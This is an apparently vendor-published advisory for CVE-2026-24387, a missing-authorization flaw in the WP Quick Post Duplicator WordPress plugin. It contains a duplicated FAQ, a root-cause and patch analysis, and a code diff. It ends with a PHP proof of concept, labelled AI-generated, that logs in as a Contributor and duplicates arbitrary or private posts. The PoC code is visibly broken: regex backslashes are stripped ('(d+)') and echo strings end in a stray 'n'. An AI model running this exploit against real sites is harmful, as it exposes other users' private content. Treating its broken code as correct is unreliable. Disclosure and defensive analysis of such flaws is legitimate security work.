What is CVE-2026-24387?

CVE-2026-24387 is a medium severity vulnerability in the WP Quick Post Duplicator plugin for WordPress, affecting versions up to and including 2.1. It stems from a missing authorization check that allows authenticated users with Contributor-level access or higher to duplicate posts they should not have access to.

How does the vulnerability work?

The vulnerability arises from the function `apj_duplicate_post_as_a_draft()`, which lacks proper checks to verify if a user has permission to duplicate a specific post. This allows attackers to send crafted requests to duplicate any post, including private posts, by simply having Contributor-level access.

Who is affected by this vulnerability?

Any WordPress site using the WP Quick Post Duplicator plugin version 2.1 or earlier is affected. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the WP Quick Post Duplicator plugin installed. If it is version 2.1 or earlier, your site is at risk. Additionally, review user roles to identify if any users have Contributor-level access or higher.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-24387 is 4.3, categorized as medium severity. This indicates a moderate risk level, suggesting that while the vulnerability is not critical, it can still lead to unauthorized access and potential data exposure.

How can I fix or mitigate this issue?

To mitigate this vulnerability, update the WP Quick Post Duplicator plugin to version 2.2 or later, where the issue has been patched. Regularly check for plugin updates and apply them promptly to maintain security.

What changes were made in the patched version?

In version 2.2, a critical capability check was added to ensure users have permission to read the specific post before duplication. Additionally, nonce verification was improved to bind to specific post IDs, enhancing overall security.

What is the impact of exploitation?

If exploited, authenticated attackers can duplicate any post on the site, including private and sensitive content. This could lead to unauthorized access to information, content manipulation, or SEO spam.

How does the proof of concept demonstrate the issue?

The proof of concept outlines a method where an attacker authenticates as a Contributor and sends a request to duplicate a post using the vulnerable endpoint. It illustrates how the lack of authorization checks allows access to posts that should be restricted.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, review user permissions and limit access for Contributor-level users to reduce the risk of exploitation.

Are there any other security best practices to follow?

In addition to updating plugins, regularly audit user roles and permissions, implement strong authentication methods, and maintain backups of your site. These practices help to minimize the impact of potential vulnerabilities.

Where can I find more information about this vulnerability?

More information can be found in the official CVE database, security advisories from WordPress, and the plugin’s repository on WordPress.org, where you can also find details about updates and patches.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24387: WP Quick Post Duplicator <= 2.1 – Missing Authorization (wp-quick-post-duplicator)

CVE ID CVE-2026-24387

Plugin wp-quick-post-duplicator

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 2.1

Patched Version 2.2

Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24387:
The WP Quick Post Duplicator plugin for WordPress versions up to and including 2.1 contains a missing authorization vulnerability. The plugin’s post duplication function lacks proper capability checks, allowing authenticated users with Contributor-level permissions or higher to duplicate posts they should not have access to. This vulnerability has a CVSS score of 4.3 and is classified under CWE-862 (Missing Authorization).

Root Cause:
The vulnerable function `apj_duplicate_post_as_a_draft()` in wp-quick-post-duplicator.php performs only a generic `current_user_can(‘edit_posts’)` check at line 87. This check validates that the user can edit posts in general but does not verify they have permission to read or edit the specific post being duplicated. The function accepts a post ID via the `post` GET parameter and proceeds with duplication without verifying the user’s authorization for that specific post object. The nonce verification at line 103 uses a generic `wqpd_clone_post_page_nonce` that is not bound to the specific post ID.

Exploitation:
An attacker with Contributor-level access can craft a request to the WordPress admin handler endpoint `/wp-admin/admin.php` with specific parameters. The attack requires the `action` parameter set to `apj_duplicate_post_as_a_draft` and the `post` parameter containing the numeric ID of any post, including private posts or posts belonging to other users. The request must include a valid nonce obtained from the plugin’s duplicate link interface. The attacker can duplicate any post regardless of ownership or visibility status.

Patch Analysis:
Version 2.2 introduces multiple security enhancements. The patch adds a critical capability check at line 117: `if ( ! current_user_can( ‘read_post’, $post_id ) )`. This ensures users must have explicit permission to read the specific post before duplication. The nonce verification at line 103 now uses a post-specific nonce: `check_admin_referer( ‘wqpd_clone_post_’ . $post_id )`. Additional validation includes checking for private posts at line 122 and using `absint()` for post ID sanitization at line 96. The duplicate link generation function `apj_duplicate_post_link()` now includes proper early returns and permission checks.

Impact:
Exploitation allows authenticated attackers with Contributor permissions to duplicate any post on the WordPress site, including private posts, draft posts, and posts belonging to other users. This violates the principle of least privilege and can lead to unauthorized access to sensitive content. Attackers can exfiltrate content they should not view, create unauthorized copies of proprietary information, and potentially use duplicated posts for further attacks such as SEO spam or content manipulation.

Differential between vulnerable and patched code

Code Diff

--- a/wp-quick-post-duplicator/wp-quick-post-duplicator.php
+++ b/wp-quick-post-duplicator/wp-quick-post-duplicator.php
@@ -4,17 +4,16 @@
  *
  *
  * @package WP Quick Post Duplicator
- * @version 2.1
+ * @version 2.2
  * @since 1.0
  */
 /**
- /**
  * Plugin Name: WP Quick Post Duplicator
  * Plugin URI:  https://wordpress.org/plugins/wp-quick-post-duplicator/
  * Description: Copy or Duplicate any post types, including pages, taxonomies & custom fields with a single click.
  * Author:      Arul Prasad J
  * Author URI:  https://profiles.wordpress.org/arulprasadj/
- * Version:     2.1
+ * Version:     2.2
  * Text Domain: wp-quick-post-duplicator
  * Domain Path: /languages
  * License:     GPLv2 or later (license.txt)
@@ -36,110 +35,153 @@
 * - apj_duplicate_post_as_a_draft()
 * Classes list:
 */
-function apj_duplicate_post_link($actions, $post)
-{
-    if (current_user_can('edit_posts'))
-    {
-        if ( $post->post_type == "post" || $post->post_type == "page" ) {
-            $url = admin_url( 'admin.php' );
-            if ( current_user_can( 'edit_post', $post->ID ) ) {
-                // adding a nonce in this link
-                    $copy_link = wp_nonce_url( add_query_arg( array( 'action' => 'apj_duplicate_post_as_a_draft','post'=>$post->ID ), $url ), 'wqpd_clone_post_page_nonce' );
+/**
+ * Add duplicate link to post/page row actions
+ */
+function apj_duplicate_post_link( $actions, $post ) {

-                    $actions['duplicate'] = '<a href="' . $copy_link . '" rel="permalink">Duplicate This Item</a>';
-            }
-        }
+    if ( ! current_user_can( 'edit_posts' ) ) {
+        return $actions;
+    }
+
+    if ( $post->post_type !== 'post' && $post->post_type !== 'page' ) {
+        return $actions;
     }
+
+    // Only show link if user can edit THIS post
+    if ( ! current_user_can( 'edit_post', $post->ID ) ) {
+        return $actions;
+    }
+
+    $url = admin_url( 'admin.php' );
+
+    // 🔐 Nonce bound to post ID
+    $copy_link = wp_nonce_url(
+        add_query_arg(
+            array(
+                'action' => 'apj_duplicate_post_as_a_draft',
+                'post'   => $post->ID,
+            ),
+            $url
+        ),
+        'wqpd_clone_post_' . $post->ID
+    );
+
+    $actions['duplicate'] = '<a href="' . esc_url( $copy_link ) . '" rel="permalink">Duplicate This Item</a>';
+
     return $actions;
 }

-$post_types = get_post_types('', 'names');
-
-foreach ($post_types as $post_type)
-{
-    add_filter($post_type . '_row_actions', 'apj_duplicate_post_link', 10, 2);
+/**
+ * Attach duplicate link to all post types
+ */
+$post_types = get_post_types( array(), 'names' );
+foreach ( $post_types as $post_type ) {
+    add_filter( $post_type . '_row_actions', 'apj_duplicate_post_link', 10, 2 );
 }

-function apj_duplicate_post_as_a_draft()
-{
+/**
+ * Duplicate post handler (SECURE)
+ */
+function apj_duplicate_post_as_a_draft() {
     global $wpdb;
-    //check current user have a preveligies to edit post or page
-    if(!current_user_can( 'edit_posts' )){
-    wp_die("you don't have a permission");
-    }
-	// check user from right place
-	check_admin_referer('wqpd_clone_post_page_nonce');
-
-    if (!(isset($_GET['post']) || isset($_POST['post']) || (isset($_REQUEST['action']) && 'apj_duplicate_post_as_a_draft' == $_REQUEST['action'])))
-    {
-        wp_die('No post to duplicate has been supplied!');
-    }
-
-    $apjvalue1       = intval($_GET['post']);
-
-    $apjvalue2       = intval($_POST['post']);
-
-    $post_id         = (isset($apjvalue1) ? $apjvalue1 : $apjvalue2);
-
-    $post            = get_post($post_id);
-
-    $current_user    = wp_get_current_user();
-    $new_post_author = $current_user->ID;
-
-    if (isset($post) && $post != null)
-    {
-
-        $args            = array(
-            'comment_status' => $post->comment_status,
-            'ping_status'    => $post->ping_status,
-            'post_author'    => $new_post_author,
-            'post_content'   => $post->post_content,
-            'post_excerpt'   => $post->post_excerpt,
-            'post_name'      => $post->post_name,
-            'post_parent'    => $post->post_parent,
-            'post_password'  => $post->post_password,
-            'post_status'    => 'draft',
-            'post_title'     => $post->post_title,
-            'post_type'      => $post->post_type,
-            'to_ping'        => $post->to_ping,
-            'menu_order'     => $post->menu_order
-        );
-
-        $new_post_id     = wp_insert_post($args);
-
-        $taxonomies      = get_object_taxonomies($post->post_type);
-        foreach ($taxonomies as $taxonomy)
-        {
-            $post_terms      = wp_get_object_terms($post_id, $taxonomy, array(
-                'fields' => 'slugs'
-            ));
-            wp_set_object_terms($new_post_id, $post_terms, $taxonomy, false);
-        }

-        $post_meta_infos = $wpdb->get_results("SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id=$post_id");
-        if (count($post_meta_infos) != 0)
-        {
-            $main_sql_query  = "INSERT INTO $wpdb->postmeta (post_id, meta_key, meta_value) ";
-            foreach ($post_meta_infos as $meta_info)
-            {
-                $meta_key        = $meta_info->meta_key;
-                $meta_value      = addslashes($meta_info->meta_value);
-                $sql_query_select[]                 = "SELECT $new_post_id, '$meta_key', '$meta_value'";
-            }
-            $main_sql_query .= implode(" UNION ALL ", $sql_query_select);
-            $wpdb->query($main_sql_query);
-        }
+    // Must be logged in and able to edit posts
+    if ( ! current_user_can( 'edit_posts' ) ) {
+        wp_die( "You don't have permission." );
+    }
+
+    // Validate request
+    if (
+        ! isset( $_GET['post'], $_GET['_wpnonce'] ) ||
+        ! isset( $_REQUEST['action'] ) ||
+        $_REQUEST['action'] !== 'apj_duplicate_post_as_a_draft'
+    ) {
+        wp_die( 'Invalid request.' );
+    }
+
+    $post_id = absint( $_GET['post'] );
+    if ( ! $post_id ) {
+        wp_die( 'Invalid post ID.' );
+    }
+
+    // 🔐 Verify nonce bound to post
+    check_admin_referer( 'wqpd_clone_post_' . $post_id );
+
+    $post = get_post( $post_id );
+    if ( ! $post ) {
+        wp_die( 'Post not found.' );
+    }
+
+    /**
+     * 🔐 CRITICAL FIX
+     * Ensure user is allowed to READ this post
+     */
+    if ( ! current_user_can( 'read_post', $post_id ) ) {
+        wp_die( 'You are not allowed to duplicate this post.' );
+    }

-        wp_redirect(admin_url('edit.php?post_type=' . $post->post_type));
-        exit;
+    /**
+     * Extra protection for private posts
+     */
+    if ( $post->post_status === 'private' && ! current_user_can( 'edit_post', $post_id ) ) {
+        wp_die( 'You are not allowed to duplicate private posts.' );
     }
-    else
-    {
-        wp_die('Post creation failed, could not find original post: ' . $post_id);
+
+    $current_user = wp_get_current_user();
+
+    $args = array(
+        'comment_status' => $post->comment_status,
+        'ping_status'    => $post->ping_status,
+        'post_author'    => $current_user->ID,
+        'post_content'   => $post->post_content,
+        'post_excerpt'   => $post->post_excerpt,
+        'post_name'      => $post->post_name,
+        'post_parent'    => $post->post_parent,
+        'post_password'  => $post->post_password,
+        'post_status'    => 'draft',
+        'post_title'     => $post->post_title,
+        'post_type'      => $post->post_type,
+        'to_ping'        => $post->to_ping,
+        'menu_order'     => $post->menu_order,
+    );
+
+    $new_post_id = wp_insert_post( $args );
+
+    if ( is_wp_error( $new_post_id ) ) {
+        wp_die( 'Failed to create duplicate post.' );
+    }
+
+    // Copy taxonomies
+    $taxonomies = get_object_taxonomies( $post->post_type );
+    foreach ( $taxonomies as $taxonomy ) {
+        $terms = wp_get_object_terms( $post_id, $taxonomy, array( 'fields' => 'slugs' ) );
+        wp_set_object_terms( $new_post_id, $terms, $taxonomy, false );
     }
+
+    // Copy post meta (safe method)
+    $post_meta_infos = $wpdb->get_results(
+        $wpdb->prepare(
+            "SELECT meta_key, meta_value FROM $wpdb->postmeta WHERE post_id = %d",
+            $post_id
+        )
+    );
+
+    if ( $post_meta_infos ) {
+        foreach ( $post_meta_infos as $meta_info ) {
+            add_post_meta(
+                $new_post_id,
+                $meta_info->meta_key,
+                maybe_unserialize( $meta_info->meta_value )
+            );
+        }
+    }
+
+    wp_redirect( admin_url( 'edit.php?post_type=' . $post->post_type ) );
+    exit;
 }
-add_action('admin_action_apj_duplicate_post_as_a_draft', 'apj_duplicate_post_as_a_draft');

+add_action( 'admin_action_apj_duplicate_post_as_a_draft', 'apj_duplicate_post_as_a_draft' );

 function PluginRowMeta($links_array, $plugin_file_name)
 {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24387 - WP Quick Post Duplicator <= 2.1 - Missing Authorization
<?php

$target_url = 'https://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';
$target_post_id = 123; // ID of post to duplicate (can be private/other user's post)

// Step 1: Authenticate and get admin cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Visit posts page to get nonce from duplicate link
$posts_url = $target_url . '/wp-admin/edit.php';
curl_setopt($ch, CURLOPT_URL, $posts_url);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);

// Extract nonce from duplicate link (simplified - in reality would parse HTML)
// The nonce is in URLs like: /wp-admin/admin.php?action=apj_duplicate_post_as_a_draft&post=X&_wpnonce=XXXXX
// For this PoC, we assume attacker has obtained a valid nonce from their own post
preg_match('/admin.php?action=apj_duplicate_post_as_a_draft&post=(d+)&_wpnonce=([a-f0-9]+)/', $response, $matches);
$nonce = $matches[2] ?? '';

// Step 3: Exploit missing authorization to duplicate unauthorized post
$exploit_url = $target_url . '/wp-admin/admin.php';
$exploit_params = [
    'action' => 'apj_duplicate_post_as_a_draft',
    'post' => $target_post_id,
    '_wpnonce' => $nonce
];

curl_setopt($ch, CURLOPT_URL, $exploit_url . '?' . http_build_query($exploit_params));
curl_setopt($ch, CURLOPT_POST, 0);
$exploit_response = curl_exec($ch);

// Check for success (redirect to edit.php with post_type parameter)
if (strpos($exploit_response, 'edit.php?post_type=') !== false) {
    echo "[+] Successfully duplicated post ID: $target_post_idn";
} else {
    echo "[-] Exploit failedn";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-24387?
Overview of the vulnerability
CVE-2026-24387 is a medium severity vulnerability in the WP Quick Post Duplicator plugin for WordPress, affecting versions up to and including 2.1. It stems from a missing authorization check that allows authenticated users with Contributor-level access or higher to duplicate posts they should not have access to.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the function `apj_duplicate_post_as_a_draft()`, which lacks proper checks to verify if a user has permission to duplicate a specific post. This allows attackers to send crafted requests to duplicate any post, including private posts, by simply having Contributor-level access.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the WP Quick Post Duplicator plugin version 2.1 or earlier is affected. Specifically, authenticated users with Contributor-level permissions or higher can exploit this vulnerability.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the WP Quick Post Duplicator plugin installed. If it is version 2.1 or earlier, your site is at risk. Additionally, review user roles to identify if any users have Contributor-level access or higher.
What is the CVSS score and what does it mean?
Understanding risk assessment
The CVSS score for CVE-2026-24387 is 4.3, categorized as medium severity. This indicates a moderate risk level, suggesting that while the vulnerability is not critical, it can still lead to unauthorized access and potential data exposure.
How can I fix or mitigate this issue?
Recommended actions
To mitigate this vulnerability, update the WP Quick Post Duplicator plugin to version 2.2 or later, where the issue has been patched. Regularly check for plugin updates and apply them promptly to maintain security.
What changes were made in the patched version?
Details of the security enhancements
In version 2.2, a critical capability check was added to ensure users have permission to read the specific post before duplication. Additionally, nonce verification was improved to bind to specific post IDs, enhancing overall security.
What is the impact of exploitation?
Consequences of the vulnerability
If exploited, authenticated attackers can duplicate any post on the site, including private and sensitive content. This could lead to unauthorized access to information, content manipulation, or SEO spam.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept outlines a method where an attacker authenticates as a Contributor and sends a request to duplicate a post using the vulnerable endpoint. It illustrates how the lack of authorization checks allows access to posts that should be restricted.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, review user permissions and limit access for Contributor-level users to reduce the risk of exploitation.
Are there any other security best practices to follow?
Enhancing overall WordPress security
In addition to updating plugins, regularly audit user roles and permissions, implement strong authentication methods, and maintain backups of your site. These practices help to minimize the impact of potential vulnerabilities.
Where can I find more information about this vulnerability?
Resources for further reading
More information can be found in the official CVE database, security advisories from WordPress, and the plugin’s repository on WordPress.org, where you can also find details about updates and patches.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations